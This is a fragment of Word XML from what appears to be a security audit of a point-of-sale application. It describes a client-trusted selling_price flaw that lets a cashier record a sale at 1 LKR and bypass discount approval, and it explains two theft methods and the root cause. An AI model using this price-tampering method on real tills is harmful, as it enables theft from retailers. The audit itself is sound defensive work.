          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 1     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>catalogue price: 32,000 LKR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F01748D" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="397" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="182"/>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 xml:space="preserve">→ 201 Created, INV0003, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>net_total</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> persisted as 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E11B2B" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="12"/>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5024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4183418F" wp14:editId="6376E1A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-856561</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6480126" cy="1495425"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26040" name="Group 26040"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6480126" cy="1495425"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6480126" cy="1495425"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="981" name="Shape 981"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="6480126" cy="714375"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="6480126" h="714375">
                                <a:moveTo>
                                  <a:pt x="19050" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6467474" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6470001" y="0"/>
                                  <a:pt x="6472430" y="484"/>
                                  <a:pt x="6474764" y="1445"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="5028"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6480126" y="709340"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6474764" y="712918"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6472430" y="713885"/>
                                  <a:pt x="6470001" y="714369"/>
                                  <a:pt x="6467474" y="714375"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="19050" y="714375"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="16524" y="714369"/>
                                  <a:pt x="14094" y="713885"/>
                                  <a:pt x="11760" y="712918"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="9426" y="711950"/>
                                  <a:pt x="7366" y="710574"/>
                                  <a:pt x="5580" y="708794"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="3793" y="707002"/>
                                  <a:pt x="2417" y="704943"/>
                                  <a:pt x="1450" y="702611"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="695325"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="19050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1450" y="11751"/>
                                </a:ln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016" name="Shape 1016"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="447675" y="1019175"/>
                            <a:ext cx="933450" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928800" y="930"/>
                                  <a:pt x="930660" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4645"/>
                                  <a:pt x="933450" y="6890"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="126454"/>
                                  <a:pt x="932520" y="128699"/>
                                  <a:pt x="930660" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928800" y="132420"/>
                                  <a:pt x="926555" y="133350"/>
                                  <a:pt x="923925" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126454"/>
                                  <a:pt x="0" y="123825"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6890"/>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19" name="Shape 1019"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1190625"/>
                            <a:ext cx="2038350" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2038350" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2028825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2031455" y="0"/>
                                  <a:pt x="2033700" y="930"/>
                                  <a:pt x="2035560" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2037420" y="4645"/>
                                  <a:pt x="2038350" y="6896"/>
                                  <a:pt x="2038350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2038350" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2038350" y="126454"/>
                                  <a:pt x="2037420" y="128699"/>
                                  <a:pt x="2035560" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2033700" y="132414"/>
                                  <a:pt x="2031455" y="133344"/>
                                  <a:pt x="2028825" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133344"/>
                                  <a:pt x="4650" y="132414"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2784"/>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25" name="Shape 1025"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1104900" y="1362075"/>
                            <a:ext cx="819150" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="819150" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="809625" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="812255" y="0"/>
                                  <a:pt x="814500" y="930"/>
                                  <a:pt x="816360" y="2784"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="818220" y="4645"/>
                                  <a:pt x="819150" y="6896"/>
                                  <a:pt x="819150" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="819150" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="819150" y="126454"/>
                                  <a:pt x="818220" y="128693"/>
                                  <a:pt x="816360" y="130553"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="814500" y="132414"/>
                                  <a:pt x="812255" y="133344"/>
                                  <a:pt x="809625"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3DF9A43" id="Group 26040" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-67.45pt;width:510.25pt;height:117.75pt;z-index:-251411456" coordsize="64801,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&#10;">
                <v:shape id="Shape 981" o:spid="_x0000_s1027" style="position:absolute;width:64801;height:7143;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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3fxAAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvBb9DeIK3mrUH/2yNUsRCDlKsSs+PzXN36eYlbOLu+u1NQehxmJnfMOvtYBvRURtqxwpm0wwE&#10;ceFMzaWCy/nzdQkiRGSDjWNScKcA283oZY25cT1/U3eKpUgQDjkqqGL0uZShqMhimDpPnLyray3G&#10;JNtSmhb7BLeNfMuyubRYc1qo0NOuouL3dLMKup+vQ9aEq/aLw6LX2uvb/qiVmoyHj3cQkYb4H362&#10;tVGwWs7g70w6AnLzAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhANpoHd/EAAAA3AAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1445l6480126,5028r,704312l6474764,712918v-2334,967,-4763,1451,-7290,1457l19050,714375v-2526,-6,-4956,-490,-7290,-1457c9426,711950,7366,710574,5580,708794,3793,707002,2417,704943,1450,702611l,695325,,19050,1450,11751c2417,9420,3793,7361,5580,5575,7366,3789,9426,2412,11760,1445,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,714375"/>
                </v:shape>
                <v:shape id="Shape 1016" o:spid="_x0000_s1028" style="position:absolute;left:4476;top:10191;width:9335;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="9334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7ixAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0L/Q9hCr1pYltFVqOUwrYFT7WiHofNuBu7mWw3Ubf++kYQepvH+5zZonO1OFEbrGcNw4ECQVx4&#10;Y7nUsP7K+xMQISIbrD2Thl8KsJjf9WaYGX/mTzqtYilSCIcMNVQxNpmUoajIYRj4hjhxe986jAm2&#10;pTQtnlO4q+WjUmPp0HJqqLCh14qK79XRafi5bN+eo2yWu1xt3g852ePoyWr9cN+9TEFE6uK/+Ob+&#10;MGm+Go7h+k06Qc7/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAOoGXuLEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9525,l923925,v2630,,4875,930,6735,2784c932520,4645,933450,6890,933450,9525r,114300c933450,126454,932520,128699,930660,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6890,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,933450,133350"/>
                </v:shape>
                <v:shape id="Shape 1019" o:spid="_x0000_s1029" style="position:absolute;top:11906;width:20383;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2038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tQxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9ba8JA&#10;EIXfhf6HZQq+mU18EE1dpRcEBSmYlkLfptnJhWZnw+4a4793C0LfZjjnfHNmvR1NJwZyvrWsIEtS&#10;EMSl1S3XCj4/drMlCB+QNXaWScGVPGw3D5M15tpe+ERDEWoRIexzVNCE0OdS+rIhgz6xPXHUKusM&#10;hri6WmqHlwg3nZyn6UIabDleaLCn14bK3+JsIoUPdVtVJb2/FceX1SFzX9/Dj1LTx/H5CUSgMfyb&#10;7+m9jvXTbAV/38QR5OYGAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAR8ALUMYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l2028825,v2630,,4875,930,6735,2784c2037420,4645,2038350,6896,2038350,9525r,114300c2038350,126454,2037420,128699,2035560,130559v-1860,1855,-4105,2785,-6735,2791l9525,133350v-2630,-6,-4875,-936,-6735,-2791l,123825,,9525,2790,2784c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2038350,133350"/>
                </v:shape>
                <v:shape id="Shape 1025" o:spid="_x0000_s1030" style="position:absolute;left:11049;top:13620;width:8191;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8191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dHwwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X+h/CFLwUTRQUWY1SCkIpeNCuB2/DZswubiZLEnX115tCobd5vM9ZrnvXiiuF2HjWMB4pEMSV&#10;Nw1bDeXPZjgHEROywdYzabhThPXq9WWJhfE33tF1n6zIIRwL1FCn1BVSxqomh3HkO+LMnXxwmDIM&#10;VpqAtxzuWjlRaiYdNpwbauzos6bqvL84De/yfJxtx4fwPY/Hg79XytpHqfXgrf9YgEjUp3/xn/vL&#10;5PlqMoXfb/IJcvUEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEArsbXR8MAAADdAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l809625,v2630,,4875,930,6735,2784c818220,4645,819150,6896,819150,9525r,114300c819150,126454,818220,128693,816360,130553v-1860,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4645,2790,2784,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,819150,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The consequence is not merely underselling. The application has a complete discount-approval workflow: the cashier raises a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DiscountRequest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 administrator reviews and approves or rejects it, a push notification is sent, and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC0136" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DiscountRequestController</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approve</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> applies it. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Every part of that was decorative.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A cashier wanting 30,000 LKR off simply typed a lower </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>selling_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>price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no approval was ever sought.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E273E1F"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Two ways to steal, both invisible in the books: sell at a private price to an accomplice, where the invoice, the stock movement and the profit report all agree with each other; or apply any discount with no approval record behind it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02870C5F" w14:textId="2A71B372"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Root cause.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A trust boundary drawn in the wrong place. The design treats the till as part of the system rather than as a client. That is defensible for a cash drawer in a locked shop and indefensible for an HTTP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> but the distinction is invisible unless someone </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
